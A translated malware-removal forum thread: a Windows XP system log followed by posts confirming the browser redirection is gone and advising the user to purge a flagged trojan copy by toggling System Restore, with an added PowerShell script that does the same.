"C:\Programme\WinSCP\WinSCP.exe" = C:\Programme\WinSCP\WinSCP.exe:*:Enabled:WinSCP: SFTP, FTP and SCP client -- (Martin Prikryl) ========== HKEY_LOCAL_MACHINE Uninstall List ========== [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall] "{002D9D5E-29BA-3E6D-9BC4-3D7D6DBC735C}" = Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148 "{0DEE890C-BC1C-49DC-BF41-33DC26D41031}" = Nero 7 Essentials "{0E2B0B41-7E08-4F9F-B21F-41C4133F43B7}" = mLogView "{110EB5C4-E995-4CFB-AB80-A5F315BEA9E8}" = Python 2.6 "{1D2C96C3-A3F3-49E7-B839-95279DED837F}" = Opera 10.60 "{211E8730-5681-49ED-BC6A-78C9F88E95F5}" = Adobe Shockwave Player "{23FB368F-1399-4EAC-817C-4B83ECBE3D83}" = mProSafe "{30348D0E-37F0-41EE-869B-F0441A87FFEC}" = PC Information Viewer "{3248F0A8-6813-11D6-A77B-00B0D0160060}" = Java(TM) 6 Update 6 "{350C97B3-3D7C-4EE8-BAA9-00BCB3D54227}" = WebFldrs XP "{3E9D596A-61D4-4239-BD19-2DB984D2A16F}" = mIWA "{406ECB40-9B45-459D-9E97-ADFEA4610FBA}" = Panasonic Misc Driver "{45A66726-69BC-466B-A7A4-12FCBA4883D7}" = HiJackThis "{5639BE8E-33DA-402A-B414-1FBED9CC50E1}" = DMI Viewer "{56C049BE-79E9-4502-BEA7-9754A3E60F9B}" = neroxml "{59046D29-2E6B-4224-BF0D-64F3E7A93F7B}" = LightScribe System Software 1.10.19.1 "{5E08B15D-7C97-4FC9-8500-BD7EDA18C66A}" = MICRODEM Freeware GIS "{6DAA0AF0-3B51-4EE0-83CC-47A3582DFA51}" = Loupe Utility "{7299052b-02a4-4627-81f2-1818da5d550d}" = Microsoft Visual C++ 2005 Redistributable "{770657D0-A123-3C07-8E44-1C83EC895118}" = Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 "{80540DA3-E60A-4F80-A719-E327B01F8A0F}" = Kali map2cal Converter "{880A90B0-3783-4D92-A0A3-080B00BC8B24}" = Memory-Map OS Edition Version 5 "{8A708DD8-A5E6-11D4-A706-000629E95E20}" = Intel(R) Extreme Graphics 2 Driver "{8B928BA1-EDEC-4227-A2DA-DD83026C36F5}" = mPfMgr "{8C6BB412-D3A8-4AAE-A01B-35B681789D68}" = mHelp "{90B0D222-8C21-4B35-9262-53B042F18AF9}" = mPfWiz "{917F080C-F7A3-41CE-AF03-40163647851C}" = ESET NOD32 Antivirus 
"{9309DD7E-EBFE-3C95-8B47-30D3A012F606}" = Microsoft .NET Framework 2.0 Service Pack 1 Language Pack - DEU "{93994589-6A13-49BE-8AF6-12AAC9A28529}" = Icon Enlarger "{943622A3-F5E9-464F-A025-90D02F3B8ACE}" = Hotkey Appendix "{94658027-9F16-4509-BBD7-A59FE57C3023}" = mZConfig "{993A94A9-DCE3-4774-B35D-D8C74FC1E0BE}" = Royale Remixed Theme "{99733131-7B00-4E5C-8991-113CD61D8E2F}" = Panasonic Common Components "{9A25302D-30C0-39D9-BD6F-21E6EC160475}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 "{9E9CAC61-DB2E-11DE-BE15-005056C00008}" = Paragon Backup and Recovery™ 10 Compact Edition "{A05CF147-BEED-4880-BF9B-4EAF22C77FFD}" = Microsoft Pro Photo Tools "{A0F925BF-5C55-44C2-A4E7-5A4C59791C29}" = mDriver "{A1071AEB-B0EF-3F5F-BC84-83A270EBE496}" = Microsoft .NET Framework 3.0 Service Pack 1 Language Pack - DEU "{A3051CD0-2F64-3813-A88D-B8DCCDE8F8C7}" = Microsoft .NET Framework 3.0 Service Pack 2 "{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}" = Google Update Helper "{AC76BA86-7AD7-1031-7B44-A93000000001}" = Adobe Reader 9.3.2 - Deutsch "{AD044254-C8D2-4866-9449-890EF278617B}" = CPU Idle Setting "{AEB9948B-4FF2-47C9-990E-47014492A0FE}" = MSXML 6.0 Parser "{C084BC61-E537-11DE-8616-005056806466}" = Google Earth "{C09FB3CD-3D0C-3F2D-899A-6A1D67F2073F}" = Microsoft .NET Framework 2.0 Service Pack 2 "{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}" = Microsoft .NET Framework 1.1 "{CD5C2205-7BAD-4B87-BF9A-2BAC626B29C8}" = Battery Recalibration "{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}" = Microsoft .NET Framework 3.5 SP1 "{DEEFA812-64A6-4083-BB38-87F68B6BA820}" = Hotkey Settings "{E78BFA60-5393-4C38-82AB-E8019E464EB4}" = Microsoft .NET Framework 1.1 German Language Pack "{E81667C6-2856-46D6-ABEA-6A2F42166779}" = mCore "{F0BFC7EF-9CF8-44EE-91B0-158884CD87C5}" = mMHouse "{F2A58903-E54D-4F8D-AC1D-55DEAF64A7E2}" = Global Mapper 11 "{F6090A17-0967-4A8A-B3C3-422A1B514D49}" = mDrWiFi "{FCA651F3-5BDA-4DDA-9E4A-5D87D6914CC4}" = mWlsSafe "{FD95D9B1-CD01-4240-BE5F-A2CA21B553BC}" = Wireless 
Switch Utility "7-Zip" = 7-Zip 4.60 beta "Adobe Flash Player Plugin" = Adobe Flash Player 10 Plugin "AmoKExifSorter2" = AmoK Exif Sorter 2.5.4 (nur deinstallieren) "BDE Information Utility" = BDE Information Utility "cGPSmapper Free_is1" = cGPSmapper Free 0099a "EASEUS Data Recovery Wizard 5.0.1_is1" = EASEUS Data Recovery Wizard 5.0.1 "EASEUS Partition Master Professional Edition_is1" = EASEUS Partition Master 5.5.1 Professional "ECW ActiveX Controls" = ECW ActiveX Controls 3.1.0.229 "ECW Header Editor" = ECW Header Editor 2.52 "ER Viewer 7.3" = ERDAS ER Viewer 7.3 & Microsoft Office Plugin "GeoTiffExaime" = GeoTiffExaime "GPS-Track-Analyse.NET_is1" = 5.0.1 "hp deskjet 930c series_Driver" = hp deskjet 930c series "ImgBurn" = ImgBurn "Installing HSP56 MicroModem Drivers" = Panasonic V.92 MDC Modem Drivers "InstallShield_{99733131-7B00-4E5C-8991-113CD61D8E2F}" = Panasonic Common Components "IrfanView" = IrfanView (remove only) "IsoBuster_is1" = IsoBuster 2.4 "Malwarebytes' Anti-Malware_is1" = Malwarebytes' Anti-Malware "MasterSplitter" = MasterSplitter Program "Microsoft .NET Framework 1.1 (1033)" = Microsoft .NET Framework 1.1 "Microsoft .NET Framework 3.5 SP1" = Microsoft .NET Framework 3.5 SP1 "NewsLeecher_is1" = NewsLeecher v3.9 Final "OziExplorer 3.95_is1" = OziExplorer 3.95 "OziMrSid Dll_is1" = OziMrSid Dll Version 3.00 "PanasonicHotkeyDriver" = Hotkey Driver for Panasonic PC "PhotoME_is1" = PhotoME "ProInst" = Intel(R) PROSet/Wireless Software "QuickPar" = QuickPar 0.9 "rarslave_is1" = rarslave 0.1.9 build 11 BETA "Runtimes" = Allgemeine Runtime Dateien "Sandboxie" = Sandboxie 3.442 "Secunia PSI" = Secunia PSI "Snapshot" = Snapshot (remove only) "Sophos-AntiRootkit" = Sophos Anti-Rootkit 1.5.0 "SynTPDeinstKey" = Synaptics Pointing Device Driver "Touratech QV 4_is1" = Touratech QV 4 "ttkCAL_is1" = TatukGIS Calculator 2.0.4.176 "ttkVWR_is1" = TatukGIS Viewer 1.13.1.370 "VirtualCloneDrive" = VirtualCloneDrive "WinDjView" = WinDjView 1.0.3 "WinHTTrack Website 
Copier_is1" = WinHTTrack Website Copier 3.43-9C "WinMount3_is1" = WinMount V3.1.0 Beta 0925 "WinRAR archiver" = WinRAR "winscp3_is1" = WinSCP 4.2.5 "WMV9APDMOE" = Windows Media Video 9 Advanced Profile Codec "XnView_is1" = XnView 1.96.5 "XpsEPSC" = XML Paper Specification Shared Components Pack 1.0 "XPSEPSCLP" = XML Paper Specification Shared Components Language Pack 1.0 "XPSP3UPPACK" = Sereby's XP SP3 Updatepack Version 3.8.6 "ZonerPhotoStudio12_EN_is1" = Zoner Photo Studio 12 ========== HKEY_USERS Uninstall List ========== [HKEY_USERS\S-1-5-21-1957994488-1580818891-842925246-1004\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall] "602272bddadc0877" = LizardTech GeoViewer "T4A Maps Ethiopia/Sudan/Egypt/Somalia 8,10 (Routable)" = T4A Maps Ethiopia/Sudan/Egypt/Somalia 8,10 (Routable) ========== Last 10 Event Log Errors ========== [ Application Events ] Error - 21.05.2010 18:47:13 | Computer Name = TOUGHBOOK | Source = Application Error | ID = 1000 Description = Fehlgeschlagene Anwendung i_view32.exe, Version 4.2.5.0, fehlgeschlagenes Modul ntdll.dll, Version 5.1.2600.5755, Fehleradresse 0x0000100b. Error - 08.06.2010 11:08:39 | Computer Name = TOUGHBOOK | Source = Windows Product Activation | ID = 1012 Description = Aufgrund von Hardwareänderungen auf diesem Computer, müssen Sie Windows erneut aktivieren. Error - 08.06.2010 12:37:57 | Computer Name = TOUGHBOOK | Source = Windows Product Activation | ID = 1009 Description = Sie haben dieses Produkt nicht fristgerecht aktiviert. Wenden Sie sich telefonisch an den Kundendienst, um Windows zu aktivieren. Error - 15.06.2010 15:55:40 | Computer Name = TOUGHBOOK | Source = Application Hang | ID = 1002 Description = Stillstehende Anwendung opera.exe, Version 9.52.10108.0, Stillstandmodul hungapp, Version 0.0.0.0, Stillstandadresse 0x00000000. 
Error - 18.06.2010 05:40:17 | Computer Name = TOUGHBOOK | Source = EventSystem | ID = 4609 Description = Das COM+-Ereignissystem hat einen ungültigen Rückgabecode während der internen Verarbeitung erkannt. HRESULT war 800706BF von Zeile 44 von d:\comxp_sp3\com\com1x\src\events\tier1\eventsystemobj.cpp. Wenden Sie sich an den Microsoft-Produktsuppor Error - 18.06.2010 09:44:35 | Computer Name = TOUGHBOOK | Source = EventSystem | ID = 4609 Description = Das COM+-Ereignissystem hat einen ungültigen Rückgabecode während der internen Verarbeitung erkannt. HRESULT war 800706BA von Zeile 44 von d:\comxp_sp3\com\com1x\src\events\tier1\eventsystemobj.cpp. Wenden Sie sich an den Microsoft-Produktsuppor Error - 19.06.2010 11:40:52 | Computer Name = TOUGHBOOK | Source = Application Hang | ID = 1002 Description = Stillstehende Anwendung opera.exe, Version 9.52.10108.0, Stillstandmodul hungapp, Version 0.0.0.0, Stillstandadresse 0x00000000. Error - 20.06.2010 13:57:31 | Computer Name = TOUGHBOOK | Source = Application Error | ID = 1000 Description = Fehlgeschlagene Anwendung opera.exe, Version 9.52.10108.0, fehlgeschlagenes Modul unknown, Version 0.0.0.0, Fehleradresse 0x100019e1. Error - 21.06.2010 06:18:17 | Computer Name = TOUGHBOOK | Source = EventSystem | ID = 4609 Description = Das COM+-Ereignissystem hat einen ungültigen Rückgabecode während der internen Verarbeitung erkannt. HRESULT war 800706BA von Zeile 44 von d:\comxp_sp3\com\com1x\src\events\tier1\eventsystemobj.cpp. Wenden Sie sich an den Microsoft-Produktsuppor Error - 21.06.2010 06:43:22 | Computer Name = TOUGHBOOK | Source = EventSystem | ID = 4609 Description = Das COM+-Ereignissystem hat einen ungültigen Rückgabecode während der internen Verarbeitung erkannt. HRESULT war 800706BF von Zeile 44 von d:\comxp_sp3\com\com1x\src\events\tier1\eventsystemobj.cpp. 
Wenden Sie sich an den Microsoft-Produktsuppor [ System Events ] Error - 20.06.2010 18:48:12 | Computer Name = TOUGHBOOK | Source = Service Control Manager | ID = 7034 Description = Dienst "Intel(R) PROSet/Wireless Event Log" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert. Error - 20.06.2010 18:48:12 | Computer Name = TOUGHBOOK | Source = Service Control Manager | ID = 7034 Description = Dienst "LightScribeService Direct Disc Labeling Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert. Error - 20.06.2010 18:48:12 | Computer Name = TOUGHBOOK | Source = Service Control Manager | ID = 7034 Description = Dienst "Intel(R) PROSet/Wireless Registry Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert. Error - 20.06.2010 18:48:12 | Computer Name = TOUGHBOOK | Source = Service Control Manager | ID = 7034 Description = Dienst "Sandboxie Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert. Error - 20.06.2010 18:48:14 | Computer Name = TOUGHBOOK | Source = Service Control Manager | ID = 7034 Description = Dienst "InCD Helper" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert. Error - 21.06.2010 06:17:16 | Computer Name = TOUGHBOOK | Source = Service Control Manager | ID = 7031 Description = Der Dienst "Remoteprozeduraufruf (RPC)" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 60000 Millisekunden durchgeführt: Starten Sie den Computer neu.. Error - 21.06.2010 06:42:16 | Computer Name = TOUGHBOOK | Source = Service Control Manager | ID = 7031 Description = Der Dienst "Remoteprozeduraufruf (RPC)" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 60000 Millisekunden durchgeführt: Starten Sie den Computer neu.. 
Error - 28.06.2010 16:51:53 | Computer Name = TOUGHBOOK | Source = sr | ID = 1 Description = Beim Verarbeiten der Datei "A0001235.SRC" auf Volume "HarddiskVolume4" ist im Wiederherstellungsfilter der unerwartete Fehler "0xC000007F" aufgetreten. Die Volumeüberwachung wurde angehalten. Error - 02.07.2010 06:45:52 | Computer Name = TOUGHBOOK | Source = Service Control Manager | ID = 7038 Description = Der Dienst "SSDPSRV" konnte sich nicht als "NT AUTHORITY\LocalService" mit dem aktuellen Kennwort aufgrund des folgenden Fehlers anmelden: %%5 Vergewissern Sie sich, dass der Dienst richtig konfiguriert ist im Dienste-Snap-In in der Microsoft Management Console (MMC). Error - 02.07.2010 06:45:52 | Computer Name = TOUGHBOOK | Source = Service Control Manager | ID = 7000 Description = Der Dienst "SSDP-Suchdienst" wurde aufgrund folgenden Fehlers nicht gestartet: %%1069 < End of report > |
04.07.2010, 10:22 | #8 |
/// Malware-holic | Links are redirected, AV websites and programs no longer work, homepage hacked | Does the problem still exist?
07.07.2010, 00:17 | #9 |
| Links are redirected, AV websites and programs no longer work, homepage hacked | Hello marcusg, no, since the run with ComboFix the symptoms are gone. Everything seems to be fine. sejott
07.07.2010, 12:04 | #10 |
/// Malware-holic | Links are redirected, AV websites and programs no longer work, homepage hacked | What does an ESET system scan say? After an update, of course.
07.07.2010, 23:08 | #11 |
| Links are redirected, AV websites and programs no longer work, homepage hacked | There is still one message from NOD32: Code:
ATTFilter D:\System Volume Information\_restore{9CE13958-8543-4CCA-84F0-8543FE1A12FE}\RP21\A0006210.exe - möglicherweise Variante von Win32/Agent Trojaner - Gesäubert durch Löschen - in Quarantäne kopiert |
08.07.2010, 12:09 | #12 |
/// Malware-holic | Links are redirected, AV websites and programs no longer work, homepage hacked | Right-click My Computer, Properties, disable System Restore on all drives. Apply, OK. Wait 10 minutes and switch it back on. That should take care of that as well.
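The restore-point purge described in the post above, scripted as an added example (not from the thread or from any of the tools named in it) for Windows XP through the WMI SystemRestore class; it assumes an elevated PowerShell 2.0 session, a working WMI/RPC service, and uses the 10-minute wait the post recommends:

```powershell
# Added example: drop every System Restore point by turning System Restore off and
# back on for all fixed drives, the scripted equivalent of the GUI steps above.
# Assumes: run as Administrator on Windows XP; WMI/RPC is working again.

$sr = [wmiclass] "\\.\root\default:SystemRestore"

# Fixed local disks only (DriveType 3); removable and network drives are skipped.
$drives = Get-WmiObject -Class Win32_LogicalDisk -Filter "DriveType = 3" |
          ForEach-Object { $_.DeviceID + "\" }

# List what will be discarded: every restore point, including the one that still
# holds the file NOD32 flagged under _restore{...}\RP21.
Get-WmiObject -Namespace "root\default" -Class SystemRestore |
    Sort-Object SequenceNumber |
    Format-Table SequenceNumber, Description, CreationTime -AutoSize

foreach ($d in $drives) {
    $rc = $sr.Disable($d).ReturnValue          # 0 = success
    if ($rc -eq 0) { Write-Host "System Restore disabled on $d" }
    else           { Write-Warning "Disable on $d failed with code $rc" }
}

# Give the service time to purge the _restore{...} folders (the post says 10 minutes).
Start-Sleep -Seconds 600

foreach ($d in $drives) {
    $rc = $sr.Enable($d, $true).ReturnValue    # $true = wait until re-enabled
    if ($rc -eq 0) { Write-Host "System Restore re-enabled on $d" }
    else           { Write-Warning "Enable on $d failed with code $rc" }
}

# Verify: the old restore points are gone; only points created from now on remain.
$remaining = @(Get-WmiObject -Namespace "root\default" -Class SystemRestore).Count
Write-Host "Restore points remaining: $remaining"
```

A fresh AV scan afterwards should no longer report the copy under System Volume Information, since the restore point that contained it no longer exists.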
13.07.2010, 18:56 | #13 |
| Links are redirected, AV websites and programs no longer work, homepage hacked | Hello markusg, I did that and have not noticed anything negative since. So hopefully that is settled. It was less effort than I initially thought. Many thanks to you and of course especially to sUBs!